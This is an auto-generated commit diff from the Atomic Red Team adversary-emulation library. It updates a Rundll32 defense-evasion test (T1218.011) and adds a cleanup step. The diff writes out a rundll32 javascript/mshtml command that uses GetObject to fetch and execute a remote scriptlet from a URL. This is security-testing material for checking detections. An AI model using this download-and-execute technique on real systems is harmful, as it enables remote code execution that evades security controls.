Generated docs from job=generate-docs branch=master [ci skip]

atomics/Indexes/Indexes-CSV/index.csv

@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -1,5 +1,5 @@
 Tactic,Technique #,Technique Name,Test #,Test Name,Test GUID,Executor Name
-defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be,command_prompt
+defense-evasion,T1218.011,Rundll32,1,Rundll32 execute JavaScript Remote Payload With GetObject,57ba4ce9-ee7a-4f27-9928-3c70c489b59d,command_prompt
 defense-evasion,T1218.011,Rundll32,2,Rundll32 execute VBscript command,638730e7-7aed-43dc-bf8c-8117f805f5bb,command_prompt
 defense-evasion,T1218.011,Rundll32,3,Rundll32 advpack.dll Execution,d91cae26-7fc1-457b-a854-34c8aad48c89,command_prompt
 defense-evasion,T1218.011,Rundll32,4,Rundll32 ieadvpack.dll Execution,5e46a58e-cbf6-45ef-a289-ed7754603df9,command_prompt

atomics/Indexes/index.yaml

@@ -240,7 +240,7 @@ defense-evasion:
       identifier: T1218.011
     atomic_tests:
     - name: Rundll32 execute JavaScript Remote Payload With GetObject
-      auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+      auto_generated_guid: 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
       description: 'Test execution of a remote script using rundll32.exe. Upon execution
         notepad.exe will be opened.
 
@@ -253,7 +253,11 @@ defense-evasion:
           type: Url
           default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.011/src/T1218.011.sct
       executor:
-        command: 'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+        command: 'start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication
+          ";document.write();GetObject("script:#{file_url}").Exec();
+
+          '
+        cleanup_command: 'taskkill /IM notepad.exe /f
 
           '
         name: command_prompt

atomics/T1218.011/T1218.011.md

@@ -45,7 +45,7 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
 **Supported Platforms:** Windows
 
 
-**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be
+**auto_generated_guid:** 57ba4ce9-ee7a-4f27-9928-3c70c489b59d
 
 
 
@@ -61,9 +61,13 @@ Test execution of a remote script using rundll32.exe. Upon execution notepad.exe
 
 
 ```cmd
-rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
+start /b rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:#{file_url}").Exec();
 ```
 
+#### Cleanup Commands:
+```cmd
+taskkill /IM notepad.exe /f
+```